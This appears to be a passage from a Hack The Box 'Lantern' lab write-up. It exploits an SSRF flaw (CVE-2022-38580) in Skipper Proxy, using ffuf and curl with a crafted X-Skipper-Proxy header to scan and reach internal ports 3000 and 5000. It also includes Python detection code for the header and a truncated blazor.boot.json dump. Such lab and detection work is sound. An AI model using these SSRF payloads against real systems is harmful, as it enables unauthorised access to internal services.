SSRF
The target web application on port 80, which uses Skipper Proxy, is suspected to be vulnerable to CVE-2022-38580. The SSRF vulnerability works by appending the X-Skipper-Proxy header. Through that header, it is possible to scan internal resources.
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ python3 -c "print(*range(1, 65536), sep='\n')" > all_ports.txt
I’ll first generate a list of all possible ports from 1 to 65535
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ ffuf -c -w /usr/share/wordlists/all_ports.txt -t 200 -u http://lantern.htb/ -H 'X-Skipper-Proxy: http://127.0.0.1:FUZZ' -ic
________________________________________________
:: Method : GET
:: URL : http://lantern.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/all_ports.txt
:: Header : X-Skipper-Proxy: http://127.0.0.1:FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
22 [Status: 500, Size: 22, Words: 3, Lines: 2, Duration: 76ms]
80 [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 121ms]
3000 [Status: 200, Size: 2867, Words: 334, Lines: 58, Duration: 630ms]
5000 [Status: 200, Size: 1669, Words: 389, Lines: 50, Duration: 207ms]
8000 [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 44ms]
:: Progress: [65535/65535] :: Job [1/1] :: 1295 req/sec :: Duration: [0:01:26] :: Errors: 0 ::
ffuf discovered a total of 5 open internal ports.
Based on the returned size, I can assume that ports 80 and 8000 host the same application, while port 22 is occupied by the SSH server.
Ports 3000 and 5000, on the other hand, are interesting.
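From the defending side, the sweep above is easy to spot if the proxy logs request headers. The following is an added example, not part of the original write-up: it flags any client-supplied X-Skipper-Proxy header and reports clients that reach several distinct internal ports through it. The JSON-lines log layout, the sample records and the threshold are assumptions made for the example.

```python
import ipaddress
import json
from collections import defaultdict
from urllib.parse import urlsplit

HEADER = "x-skipper-proxy"  # header named on this page, compared case-insensitively
SWEEP_THRESHOLD = 5         # assumed: distinct internal ports per client that count as a sweep

# Constructed records. The JSON-lines layout (client, path, headers, status) is an
# assumption for this example, not Skipper's native access-log format.
SAMPLE_LOG = """\
{"client": "192.0.2.10", "path": "/", "headers": {"User-Agent": "Mozilla/5.0"}, "status": 200}
{"client": "203.0.113.50", "path": "/", "headers": {"X-Skipper-Proxy": "http://127.0.0.1:22"}, "status": 500}
{"client": "203.0.113.50", "path": "/", "headers": {"X-Skipper-Proxy": "http://127.0.0.1:80"}, "status": 200}
{"client": "203.0.113.50", "path": "/", "headers": {"X-Skipper-Proxy": "http://127.0.0.1:3000"}, "status": 200}
{"client": "203.0.113.50", "path": "/", "headers": {"X-Skipper-Proxy": "http://127.0.0.1:5000"}, "status": 200}
{"client": "203.0.113.50", "path": "/", "headers": {"X-Skipper-Proxy": "http://127.0.0.1:8000"}, "status": 200}
{"client": "198.51.100.5", "path": "/", "headers": {"x-skipper-proxy": "http://example.org/"}, "status": 200}
"""


def internal_target(value):
    """Return (host, port) when the header value names a loopback, private or
    link-local address; return None otherwise or when the value is malformed."""
    try:
        parts = urlsplit(value.strip())
        host, port = parts.hostname, parts.port  # .port raises on non-numeric ports
    except ValueError:
        return None
    if not host:
        return None
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if host.lower() == "localhost":
        return host.lower(), port
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None  # a hostname: resolve it separately before treating it as external
    if addr.is_loopback or addr.is_private or addr.is_link_local:
        return str(addr), port
    return None


def analyse(lines):
    """Return (findings, sweeps): every request carrying the header, and the
    clients that touched at least SWEEP_THRESHOLD distinct internal ports."""
    findings = []
    ports_by_client = defaultdict(set)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip damaged log lines instead of aborting the run
        headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
        if HEADER not in headers:
            continue
        # A routing header set by the client is worth recording whatever it points at.
        target = internal_target(headers[HEADER])
        findings.append({"client": rec.get("client"), "value": headers[HEADER],
                         "internal": target is not None})
        if target:
            ports_by_client[rec.get("client")].add(target[1])
    sweeps = {client: sorted(ports) for client, ports in ports_by_client.items()
              if len(ports) >= SWEEP_THRESHOLD}
    return findings, sweeps


if __name__ == "__main__":
    found, swept = analyse(SAMPLE_LOG.splitlines())
    for item in found:
        print("header seen:", item)
    for client, ports in swept.items():
        print("internal port sweep from", client, "ports", ports)
```

Stripping or rejecting the header at the edge before it reaches the proxy removes the need to rely on detection alone.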
Internal Port 3000
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ curl -i http://lantern.htb/ -H 'X-Skipper-Proxy: http://127.0.0.1:3000/'
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0
Content-Type: text/html; charset=utf-8
Date: Mon, 19 Aug 2024 12:10:20 GMT
Server: Skipper Proxy
Transfer-Encoding: chunked
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<base href="/" />
<link rel="stylesheet" href="css/bootstrap/bootstrap.min.css" />
<link href="css/site.css" rel="stylesheet" />
<link href="PreProd.styles.css" rel="stylesheet" />
<link href="https://fonts.gstatic.com" rel="preconnect">
<link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Nunito:300,300i,400,400i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet">
<!-- Vendor CSS Files -->
<link href="css/bootstrap-icons.css" rel="stylesheet">
<!-- Template Main CSS File -->
<link href="css/style.css" rel="stylesheet">
<!--Blazor:{"sequence":1,"type":"server","prerenderId":"a2b110623a454725998fc41290be9c95","descriptor":"CfDJ8BUo1ePf0MxMocV2v0oTDZHAEHhWlp52jIHUlN0Sg8kWts/cWrnwHFnr3uYxuxoVG3CvnnuEcV7SHuxN3yO1lnRJ9hqCXpZVjQLbHzrXMce2BaBNK4t1ie8sMiDyYQvmWBu7cv4M/mgN0grUzTHYnnsFDvOhwp5ItxeiMxd0gO7BsghBdXXqwWRs4Ka99gpZB6B8oE41AK5EYQkZdsyA7cjBERgAYNTuRnYqOc4LDjmSeBdYcjrmQL6K9ebjLC2CySwGX/yxRxdxNwSjM5XcVe\u002BtDCbkSHMvsc0ybToooBUXvtI7XvsUIAXbJCS8dqbzydnfch/UvxAnCbaJzqeBV07qzhepMGNfbLhT3CSG7jCcm1Pq3sn2bCtAbDuZw1/8ffU94KVSoQ9\u002BEsByEV5lPHI6ZydudwsCtqdB4O1dlTTG"}--><!--Blazor:{"prerenderId":"a2b110623a454725998fc41290be9c95"}-->
</head>
<body>
<!--Blazor:{"sequence":0,"type":"server","descriptor":"CfDJ8BUo1ePf0MxMocV2v0oTDZEffbAExTKRugW0ziZD79sabJKDPlMj41xqLSU8M7IK52/SWXiflXqVHsjfkzHaSjqKv\u002BPWhhp\u002BKTnbSmJjXhdNduWoNLMi81KMrs6uLTzvNYY7HHwa8mnUdkN/I8Q05/MvFIvvKqfUH7c5XLsQUDDFuCoHVnsKOEgjKBivnJGBn5rAOqP\u002BViZxdLOQ1eprrMbQ3IHdSQsgLgdbns0iNMDDbXWH/ksvPfVAX8V\u002BN2THhztoxdg4DWP5QqLXX9kl1AaXSo5vp0CBiWfAKLzU1AsTsSKBUXF9Be07bDX1pdPs974IFQ0mHO2uy1g/f4voLMUwA31M0Lm5ZHRjrdIkZJ4e"}-->
<div id="blazor-error-ui">
An unhandled exception has occurred. See browser dev tools for details.
<a href="" class="reload">Reload</a>
<a class="dismiss">🗙</a>
</div>
<script src="_framework/blazor.server.js"></script>
<script>
window.downloadFileFromStream = async (fileName, contentStreamReference) => {
const arrayBuffer = await contentStreamReference.arrayBuffer();
const blob = new Blob([arrayBuffer]);
const url = URL.createObjectURL(blob);
const anchorElement = document.createElement('a');
anchorElement.href = url;
anchorElement.download = fileName ?? '';
anchorElement.click();
anchorElement.remove();
URL.revokeObjectURL(url);
}
</script>
</body>
</html>
The internal port 3000 seems to be hosting the custom Blazor application seen earlier.
Internal Port 5000
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ curl -i http://lantern.htb/ -H 'X-Skipper-Proxy: http://127.0.0.1:5000/'
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 1669
Content-Type: text/html
Date: Mon, 19 Aug 2024 12:12:43 GMT
Etag: "1dae2bf21875e05"
Last-Modified: Tue, 30 Jul 2024 20:29:09 GMT
Server: Skipper Proxy
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<title>InternaLantern</title>
<base />
<script type="text/javascript">
(function (l) {
if (l.search[1] === '/') {
var decoded = l.search.slice(1).split('&').map(function (s) {
return s.replace(/~and~/g, '&')
}).join('?');
window.history.replaceState(null, null,
l.pathname.slice(0, -1) + decoded + l.hash
);
}
}(window.location))
</script>
<script>
var path = window.location.pathname.split('/');
var base = document.getElementsByTagName('base')[0];
if (window.location.host.includes('localhost')) {
base.setAttribute('href', '/');
} else if (path.length > 2) {
base.setAttribute('href', '/' + path[1] + '/');
} else if (path[path.length - 1].length != 0) {
window.location.replace(window.location.origin + window.location.pathname + '/' + window.location.search);
}
</script>
<link href="css/bootstrap/bootstrap.min.css" rel="stylesheet" />
<link href="css/app.css" rel="stylesheet" />
</head>
<body>
<div id="app">Loading...</div>
<div id="blazor-error-ui">
An unhandled error has occurred.
<a href="" class="reload">Reload</a>
<a class="dismiss">🗙</a>
</div>
<script src="_framework/blazor.webassembly.js"></script>
</body>
</html>
The internal port 5000 is indeed an internal application, also built with Blazor.
blazor.boot.json
Much like a JS-based app's package.json, the blazor.boot.json file is a configuration file used in Blazor applications to list the resources required for the app's startup, such as assemblies, dependencies, and other assets. It includes metadata for the Blazor WebAssembly runtime to properly load and initialize the application in the browser.
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ curl -i http://lantern.htb/_framework/blazor.boot.json -H 'X-Skipper-Proxy: http://127.0.0.1:5000/'
HTTP/1.1 200 OK
Accept-Ranges: bytes
Blazor-Environment: Production
Cache-Control: no-cache
Content-Length: 20709
Content-Type: application/json
Date: Mon, 19 Aug 2024 12:20:50 GMT
Etag: "1daf1abe08eff65"
Last-Modified: Sun, 18 Aug 2024 20:19:07 GMT
Server: Skipper Proxy
{
"cacheBootResources": true,
"config": [ ],
"debugBuild": true,
"entryAssembly": "InternaLantern",
"icuDataMode": 0,
"linkerEnabled": false,
"resources": {
"assembly": {
"Microsoft.AspNetCore.Authorization.dll": "sha256-hGbT4jDhpi63093bjGt+4XVJ3Z9t1FVbmgNmYYmpiNY=",
"Microsoft.AspNetCore.Components.dll": "sha256-NJ2GmZOAzlolS7ZPvt5guh86ICBupqwCNK0ygg7fkhE=",
"Microsoft.AspNetCore.Components.Forms.dll": "sha256-YEcUfJbV\/+SrxppUEKn5jqOg8WptBrdAGaDG+psN8Yg=",
"Microsoft.AspNetCore.Components.Web.dll": "sha256-aq+IFhf0HZZKVz6P\/GhuaY0UvXsguM0h5hlYrzAfugk=",
"Microsoft.AspNetCore.Components.WebAssembly.dll": "sha256-zARafz0vNUQ9qVFCoQO3oQSP+VMitM2+PZs+2OkxMgE=",
"Microsoft.AspNetCore.Metadata.dll": "sha256-hXAd66KKDdPFPpv7aqk5iax9UhTcBUufrs8eHMuWft8=",
"Microsoft.Data.Sqlite.dll": "sha256-P7LhObgh2GnsYLLiMfziXrBpg9kGBWyCbsYGkwtejF8=",
"Microsoft.EntityFrameworkCore.dll": "sha256-\/0vzNZ5eWblA2X+fR1UnJhUxV8M4YE+hmYHhDjTGLRo=",
"Microsoft.EntityFrameworkCore.Abstractions.dll": "sha256-8WueLfL+Qxf6IHdLNiHRte4+9uKx0fzs0SwZLo+vyE0=",
"Microsoft.EntityFrameworkCore.Relational.dll": "sha256-mZQU3N+UuoJQXtwxG9xddHMJcWK3bjbR8vYUtaD+qhw=",
"Microsoft.EntityFrameworkCore.Sqlite.dll": "sha256-3OAZnYHlX6IWO0525\/6Hb9dldwpLRrDYpJyOgrOfM3g=",
"Microsoft.Extensions.Caching.Abstractions.dll": "sha256-WLcZIKlgct2nj4hpaBvZXfHorQG9DH9B\/FZ2IKePG2I=",
"Microsoft.Extensions.Caching.Memory.dll": "sha256-+\/xwpO8U5NMbRcqzMIKrIuvK9dnm3EX9S2C6diMDLmQ=",
"Microsoft.Extensions.Configuration.dll": "sha256-c8yYhfrOBLEnOBglLTu9peXSbJDwFpuT4UQiXSv28Og=",
"Microsoft.Extensions.Configuration.Abstractions.dll": "sha256-5Otet+KKVUjNkE\/hqcNWmt75H1K2VNuKPFagpRd6Ces=",
"Microsoft.Extensions.Configuration.Binder.dll": "sha256-wNKhG3Ovx8jqxbscz2AALlsTLfI6GL2dyDhe63mSsoM=",
"Microsoft.Extensions.Configuration.FileExtensions.dll": "sha256-n2fRP2\/1tGNzaCF5PU4hgTSlHK886OviBf2YAds3NdE=",
"Microsoft.Extensions.Configuration.Json.dll": "sha256-R28\/ywLWxIcFxKtDIj0IxC+bXi4urX6BHeLL24R+vTQ=",
"Microsoft.Extensions.DependencyInjection.dll": "sha256-KqgYK1NWqMxcNfw2Qah+gUhX2Nm+OZrHjyYDQ3VNCeA=",
"Microsoft.Extensions.DependencyInjection.Abstractions.dll": "sha256-nM2DA1GqKLxoPU+NHO\/Z5yQWH5ctJb+2Tu5b9VxIxeM=",
"Microsoft.Extensions.DependencyModel.dll": "sha256-tkBiVGV6aPhN9weYepMZ2vvS6Ggf0uOE88fuWINRAHg=",
"Microsoft.Extensions.FileProviders.Abstractions.dll": "sha256-7PzvEcQvpK1c8tTX9VPI8AF+XrekqbAytNBQXJjvTvQ=",
"Microsoft.Extensions.FileProviders.Physical.dll": "sha256-sXujvGMZDgBBZ9HqfcEq9XsM0pvwyhPt60NA9qLDzGI=",
"Microsoft.Extensions.FileSystemGlobbing.dll": "sha256-viiXOG0fwhWobT0TQ1ZOJiZBdRvYRlWbDtjz+6d8sQI=",
"Microsoft.Extensions.Logging.dll": "sha256-GDZQCBtVHfrZZ6fL95lGoinLeUWLjQShLbfESwO7mrc=",
"Microsoft.Extensions.Logging.Abstractions.dll": "sha256-1XXJ0VQ8pybOFNvf\/RA+k+pSfNRrsoMW2h9BItvFXVY=",
"Microsoft.Extensions.Options.dll": "sha256-eGESyy9mRu8RcCGajAu4E8nxSmeB5nxiZkFPVaZ5Vl0=",
"Microsoft.Extensions.Primitives.dll": "sha256-jOmoWSfsdQexH\/6QCA56gR1RMEqeix2iDDUBWbpAOQI=",
"Microsoft.JSInterop.dll": "sha256-U4TlhQzx2DEFb2LgmELxAvWalkXk5Dx\/HsVDyQH8ubA=",
"Microsoft.JSInterop.WebAssembly.dll": "sha256-11MM537VpREUoEMIiXr2jsO5eqHCkixj9Zi1I4hLPOw=",
"Radzen.Blazor.dll": "sha256-O3yDs1MlWqWu2hreREiTQAVCo6UPcAhx\/1zwHAbq9AU=",
"SQLitePCLRaw.batteries_v2.dll": "sha256-3zKmFZbXOvqy\/nbxPUg5JZvDTOvq9arYLUdbvEcjJaU=",
"SQLitePCLRaw.core.dll": "sha256-PNJw8RYgf8D34p1OhHDWQniuocI62TExP3HpyqrrhCc=",
"SQLitePCLRaw.provider.e_sqlite3.dll": "sha256-HbBW2\/rK7rujCfVp110bCv\/xKe+LGGRcIbcF73Mq7uM=",
"System.IO.Pipelines.dll": "sha256-fpnawcAWgJ8i0JPJ9DhQ8XFDKYsTi6md2eRFNh\/bONA=",
"System.Linq.Dynamic.Core.dll": "sha256-FdGinC2F9gJYE7tbVl93B0jYWTB+CCpGiFHbABqlHFE=",
"Microsoft.CSharp.dll": "sha256-ql0JuqQqMvWlkrz+ktRnb+sgR+RBuabSpT82YicO+Dc=",
"Microsoft.VisualBasic.Core.dll": "sha256-yjDGnYBu6yp61MAe+i7sbIj\/AgPhLbBm5dleSxMPjDo=",
"Microsoft.VisualBasic.dll": "sha256-m6TH5rs0haOMSWvUpe3f7naMYyalexbVkIbVq1amiUw=",
"Microsoft.Win32.Primitives.dll": "sha256-876FS9JtlcgkjOdpbs3USC8yRAhx1J17Oe06Sxvgv1s=",
"Microsoft.Win32.Registry.dll": "sha256-XobufPKAyEWhlHb3h0C1DBkY0W+tuI2nHHzJSlv6sd4=",
"System.AppContext.dll": "sha256-hBsiGfTO8GaNHCdJ56FXzm0RGbXphFD5i7XcgumQ5eE=",
"System.Buffers.dll": "sha256-cIBVQrX2W2b5N8+mTMqkZWml\/dk2IYx7pMUf0\/Ht5W4=",
"System.Collections.Concurrent.dll": "sha256-siI159VpD2kJEZKPQt190M1ILHAQ8zZmlExN8ABLOpw=",
"System.Collections.Immutable.dll": "sha256-RnZJ2YASocT2oB\/iuNE8vQvy6NfhULpfdVIbtKIHCDI=",
"System.Collections.NonGeneric.dll": "sha256-dK0uprIk58Zq\/0ds9ff4NdXE+eGgwXEPt1+zHdwEDEQ=",
"System.Collections.Specialized.dll": "sha256-PpNg+QA9B70KCxPBqJYreFMpDplPOZEczvjo\/G+vdU4=",
"System.Collections.dll": "sha256-7+zDvydzBWfAOV3bOqXSCD7GqskEAIQ3RzZ0IXiQsAs=",
"System.ComponentModel.Annotations.dll": "sha256-gJZuo7oH44JEm+ABiI\/0SCYvW4btsifc6SQ93rolPtQ=",
"System.ComponentModel.DataAnnotations.dll": "sha256-c9XX2VfWJO2vQwja\/S9IMq4IaEVNIFBSdo1yN00ipTM=",
"System.ComponentModel.EventBasedAsync.dll": "sha256-a6Zv5CE2XCHSH6P5one9x+s9AETxFBsps9r9xjbyytk=",
"System.ComponentModel.Primitives.dll": "sha256-Ldn4aoxvjOLgvQ9Onwicuzrx2fFIu3Rz0Dv2MdNsLtw=",
"System.ComponentModel.TypeConverter.dll": "sha256-Z22usUOyo6Y+llp9jVHm8X+MiU41IkuvJTkuJMNOmx4=",
"System.ComponentModel.dll": "sha256-4mdLIiD68reMpts\/jwSZNSDriaxeKwnQN\/bbRp3ymjc=",
"System.Configuration.dll": "sha256-ndWVZOsXDGoCB+GrsvduXcLDyAcFi+H7G\/MeMcGAmkQ=",
"System.Console.dll": "sha256-sfSjogW2UHhB1\/Nh5SNyZLbc\/Qx1Sd\/t59EZEIiAGsE=",
"System.Core.dll": "sha256-UIvt8dePz7PcAULl7yQlO0Re3Q\/06HNI8nxsH1MNLFk=",
"System.Data.Common.dll": "sha256-QHHyRzOPsWFYvrU4Z2hnJmZmzhgirRscl7n7L3BiTfE=",
"System.Data.DataSetExtensions.dll": "sha256-jBgz7GiFLxY3uae0rmhsnCrhFw3nWh37zS8xK6XXCLw=",
"System.Data.dll": "sha256-uprvV1ostYH0WGtP0peiUMFKZgWyj1F3RsCA0+Pjwno=",
"System.Diagnostics.Contracts.dll": "sha256-04HscpY2KVy3rAYunUTynLbO1QdOrQEy2IWRaxtUD1E=",
"System.Diagnostics.Debug.dll": "sha256-dJ0BRGYTZEKX2lvaiF3DwOs+3NoksKxBc\/\/JkhS3el4=",
"System.Diagnostics.DiagnosticSource.dll": "sha256-6Bda\/qXnVWWS\/+W6zwzK5ahNXI+IXHSat2Y482ykUXY=",
"System.Diagnostics.FileVersionInfo.dll": "sha256-VgF91zwEvvHl9WyGF\/9\/EcW5f5hoV4nXji82rrTgODs=",
"System.Diagnostics.Process.dll": "sha256-LAcV0KCZ+lbQJx5wxbOfg+XHNwtiv0KjE5b2NlXxj4A=",
"System.Diagnostics.StackTrace.dll": "sha256-4aulZf3KsEhHbaCOEWI1MzSQKYXwVCXgXbuKWPARBMI=",
"System.Diagnostics.TextWriterTraceListener.dll": "sha256-hOv0U7h8qObsuPJEx\/m8mLcv99r5\/MdONagOQMG3h3g=",
"System.Diagnostics.Tools.dll": "sha256-yFuBkKVLF5YkUzXiUJdN9Aax1ip9qdKa4g4vHSM7Pg4=",
"System.Diagnostics.TraceSource.dll": "sha256-zSVMA9jpwFQ+HUCn5AgptC59Rqy2QluMrw5iq1Awr+o=",
"System.Diagnostics.Tracing.dll": "sha256-Znt2F2MvUczDKdqHSlxjNU1l9XUqzA+olkHYI\/\/HEZc=",
"System.Drawing.Primitives.dll": "sha256-u6Ds7SMMOdGgX52t00SUjNCXTD1imy8s7QBj2qlIam8=",
"System.Drawing.dll": "sha256-HgN64SBiB8Ajrh25n\/DjpxcW6qQuzrtxZ4Om+nR2dd4=",
"System.Dynamic.Runtime.dll": "sha256-E+Uyxsihob6Ysg2e6tonQQQzKQKAr0M2AINEgeY72Uc=",
"System.Formats.Asn1.dll": "sha256-ttncKNMxBNIMM26nmx0L1TTCxr\/r0rEIldSh7vWwHYw=",
"System.Globalization.Calendars.dll": "sha256-GPVcdDqvBvLxmW0dy4KAChwohexPWXuuSKljnSJyYEI=",
"System.Globalization.Extensions.dll": "sha256-bv7qPH+2WGAyoWOFFn31s26eTEvdwWF9B3JY7Ooueqs=",
"System.Globalization.dll": "sha256-+WfptQvKMZV5hzhEIAfPGh4++aNn+SBTCs\/iI1WR8Dk=",
"System.IO.Compression.Brotli.dll": "sha256-bGxNHKkn7llJau+sGbQ2G3ASBqnpv337+kRmN63ftLI=",
"System.IO.Compression.FileSystem.dll": "sha256-ahuONSqKzbUeueVBOowVQ6tHUijcV3h4LII\/dCWTY+w=",
"System.IO.Compression.ZipFile.dll": "sha256-dRbKoalR17SAvWAkQj7jLreA6QRJ1LIuXd2au5Xekzw=",
"System.IO.Compression.dll": "sha256-wG4o2\/MIZgfUDo1Vet1Gip0SORGlHfGp2Yp6Dxo6Vt0=",
"System.IO.FileSystem.AccessControl.dll": "sha256-eYdrk8dJz\/wUrufjP\/UNggdTFNwk4O3YwbpHTdUDsX8=",
"System.IO.FileSystem.DriveInfo.dll": "sha256-VsDACniP8x714h33W\/zlQSqoMDUEuI2PhdjL0e2iCOc=",
"System.IO.FileSystem.Primitives.dll": "sha256-YR5Y9FjJgCSd2ICb5R+kQ1OULbHknX\/rT5DcuBfEKN0=",
"System.IO.FileSystem.Watcher.dll": "sha256-DofMA10KA6kXgqHGF0T+tkZs23dvaX8tOubRco6EE0c=",
"System.IO.FileSystem.dll": "sha256-AQmejCKaDpWSbijkXOHGKGPx7omcSePn0xhYEa+9\/nU=",
"System.IO.IsolatedStorage.dll": "sha256-KI5UJjVeANP6d5Ya0iiG5ezOqCZDyL5FngTHdOu08SA=",
"System.IO.MemoryMappedFiles.dll": "sha256-bdImZQ\/CjWze5n5Q0qW+HdYxUfg0shaUKvIGaS7M4ts=",
"System.IO.Pipes.AccessControl.dll": "sha256-UPKPCzZwwaiE6bk32YvgCJjF5d3d8ORAGBzFYOAebsY=",
"System.IO.Pipes.dll": "sha256-s4RGtH\/jENkZfbXgVQRYW2M6c+x+lKPS2NQV\/I8F5Vo=",
"System.IO.UnmanagedMemoryStream.dll": "sha256-d9XMexSCGwm51FC26V1ruNMrkcaWMnaRlHZ0RlWpgk4=",
"System.IO.dll": "sha256-tPl5IEqEL9rZ0AA1lNyWr+NpSAsJXq18FGJ+yT59Axw=",
"System.Linq.Expressions.dll": "sha256-JHWBpvo7vIZoyC6nJKrsySWYISCX4rcC1vrooBjOeiw=",
"System.Linq.Parallel.dll": "sha256-pNJ8lVItDNo+fLK\/fk18QB4pRLmqbT0Ynrq3O563b3E=",
"System.Linq.Queryable.dll": "sha256-g1mOwcDyw7rBZgQx5SY0lsX8ZzXxDwTdOD3lbZjXx9g=",
"System.Linq.dll": "sha256-kKiuT3My5hXJTds+8wSpfhnkQ3EuNwAQOxLGXVWoo\/M=",
"System.Memory.dll": "sha256-WkC8Wsmx3jhJzOozIVey19+2WCRKagDXqQ2wPoTmqMQ=",
"System.Net.Http.Json.dll": "sha256-yxJsoo7mpPgba40f9MtcAVBP51xO6MdTAXUl6snT4h4=",
"System.Net.Http.dll": "sha256-r3K4KxolDW28DS3TVL\/TGXhligLQC6Z3HjHkmDmIfas=",
"System.Net.HttpListener.dll": "sha256-v4pad4WjG60vdOD6uLny6O81hhrBVd48y9rDdN8Dq\/o=",
"System.Net.Mail.dll": "sha256-2mwF5+qoPkx3XIiJi2OYUzem+cWt3VF9+KaNf8Hsye0=",
"System.Net.NameResolution.dll": "sha256-M1ZJefldkQZKromnEt+NOuyj\/yZoRNZA4ylC65eHm6g=",
"System.Net.NetworkInformation.dll": "sha256-wsMHsDbz4d5DydbVLVrBTCbD\/9iiZ7nnySLsoe9lZOA=",
"System.Net.Ping.dll": "sha256-OgyabYmjg\/QoikHVhC21oZ+j+l1qh8KY4q3r\/M2NnTI=",
"System.Net.Primitives.dll": "sha256-NG4UfhaU5YjgXEGUyUp4iQz9iZVaq4bDWEKYS25AYag=",
"System.Net.Quic.dll": "sha256-EBUis8AXuMo+\/ClBGBEBRQSBsN2VZVCUW2lK8KgqHDc=",
"System.Net.Requests.dll": "sha256-D28ojQn2wULGH3UY3KCQq\/W2tQOTXdEjf4o5QzrxjpA=",
"System.Net.Security.dll": "sha256-rtOi8JvsuVI2UHUu3K2aTXHfW\/HaUT8hfWmOCHqJfD8=",
"System.Net.ServicePoint.dll": "sha256-xC8LyLf2wKJv9NbYGxIBF0U278DK+R9EC+TiVQB3kEw=",
"System.Net.Sockets.dll": "sha256-KnJrJeKN7C63waH5UwAkTrInYNHGZn9QuVFCbLg4wMk=",
"System.Net.WebClient.dll": "sha256-ujyYKldEAwk4tEavtIDnDLqiqbzF2QjVmAzqx8MsQng=",
"System.Net.WebHeaderCollection.dll": "sha256-vnRspNkJub8sXtoWeZs8+oq+1FsquxH756RKGxjOku8=",
"System.Net.WebProxy.dll": "sha256-bIe3ECnqNiPcRaLQowGHm3WTfeCrHrs9HmTmHrrl9vI=",
"System.Net.WebSockets.Client.dll": "sha256-xkeIwJxbwgJVlEbFDEygTnyJy+fX4zml2\/9\/MSkf8gE=",
"System.Net.WebSockets.dll": "sha256-j7qKM1czN5Vc8ZqXLXPbxo4ddYPM6dXSUTShZb1rtkI=",
"System.Net.dll": "sha256-G8nfef3F7xib4OgZq9SblT3qQIliMyySyx4evJzSqEE=",
"System.Numerics.Vectors.dll": "sha256-hbOCd5D16UtHUaw9nqW8e+4GschlwoU4GEyTgTYt\/Jo=",
"System.Numerics.dll": "sha256-C9vZH9HxWKaSHK6pme42QeTgu37MzEGBSlHeQtzixEA=",
"System.ObjectModel.dll": "sha256-pm3\/qRJNMeOtJciRC71QcNZz+0T3D97YnGyOnasBho4=",
"System.Private.DataContractSerialization.dll": "sha256-QbUE5Dd94wLrv6MhfNewyz+lNv7VIFWVofS7ohYdrXU=",
"System.Private.Runtime.InteropServices.JavaScript.dll": "sha256-\/8PF7xlkMgqCzSnp4roSH8ICGHPrzz4\/1C0DIichYpI=",
"System.Private.Uri.dll": "sha256-X62lyZatIoKTJY\/Rt31LgU\/\/NX88W86O6pfWh6XS41c=",
"System.Private.Xml.Linq.dll": "sha256-UqktLl8RdHKrJ38qqF6XlvPOvi3xgY6ZVEeuOa4u6w8=",
"System.Private.Xml.dll": "sha256-feqoL93GgPoHmad5UF2r0yg4RTbJhYsXQcimiawJv6U=",
"System.Reflection.DispatchProxy.dll": "sha256-zlWNpwEJQEcx7Mf1xOg\/Sd5hIn1YGK+LBeiAhjKYabs=",
"System.Reflection.Emit.ILGeneration.dll": "sha256-Wwzmn9ixLOdT9Q4S3lsGbvU6RgX88PrdJapC2weJQ50=",
"System.Reflection.Emit.Lightweight.dll": "sha256-StIky\/cqvRUJnMZgDJ3S8zDgKeyiOXPBGul1qmY3zQo=",
"System.Reflection.Emit.dll": "sha256-8+wJTovqZaO43nyKvBpajlYed1fklPXupH24vEe1rcE=",
"System.Reflection.Extensions.dll": "sha256-14fnFJC0FAATTHPiVrQwvmLmm2qi8Ni18HvYZNZX0rs=",
"System.Reflection.Metadata.dll": "sha256-ighwuSyDVJI1oYrAoHA3PMc5uEh3LRZQ1D1+nJnzXF4=",
"System.Reflection.Primitives.dll": "sha256-YQBeKPHUbX9vi3HtoUXyks9WPlb2pyV8rtrQK\/6ycCU=",
"System.Reflection.TypeExtensions.dll": "sha256-qvnV8ZTIWtntKKNR7pZ+KwpfPO1EpWD4yh8jTkYKYRo=",
"System.Reflection.dll": "sha256-u7GYvozPApwvzjBc31GuZMeH6vtzPd9PToVE73OANPg=",
"System.Resources.Reader.dll": "sha256-c6FJmtQRb\/VHa2HJ26jk10tgkc4EPI2zAzh3K5asxbU=",
"System.Resources.ResourceManager.dll": "sha256-f4HxrKxMgkTr4MzgdDVq1xRj0nMZ4DX85ZclMulX4vQ=",
"System.Resources.Writer.dll": "sha256-dTHiLV8bUkk1UG8EMyt6DGqR0l2qPUOC9q6q0cyznYY=",
"System.Runtime.CompilerServices.Unsafe.dll": "sha256-k3HWAm8hCD5yrBJ0UPew1ORMmeGyy74ZErf6+X9ETJc=",
"System.Runtime.CompilerServices.VisualC.dll": "sha256-WXOm0n0aBJE1\/2QHYsnQLD0su942NQ7odPc+YNxdab0=",
"System.Runtime.Extensions.dll": "sha256-rzt5RwKG9PduPh47i6I1uq43MXbSEQQ5qC4IanNwgg8=",
"System.Runtime.Handles.dll": "sha256-wJflcv43fAzX3kczlUUcZaLqy6xebfNpO7YWrUdlN6M=",
"System.Runtime.InteropServices.RuntimeInformation.dll": "sha256-TXdeaQuMYwYsZekQZ94n3P\/4WBM9geAoxMU1GMUOFh8=",
"System.Runtime.InteropServices.dll": "sha256-FhSvdPrUwd2cSpIG5LueEynIbkhqsDJfuhUkjTqV7HI=",
"System.Runtime.Intrinsics.dll": "sha256-SbogkH6qeJsWsV7iPIlfWmG+OtFRsWr6PGmtmYel3ss=",
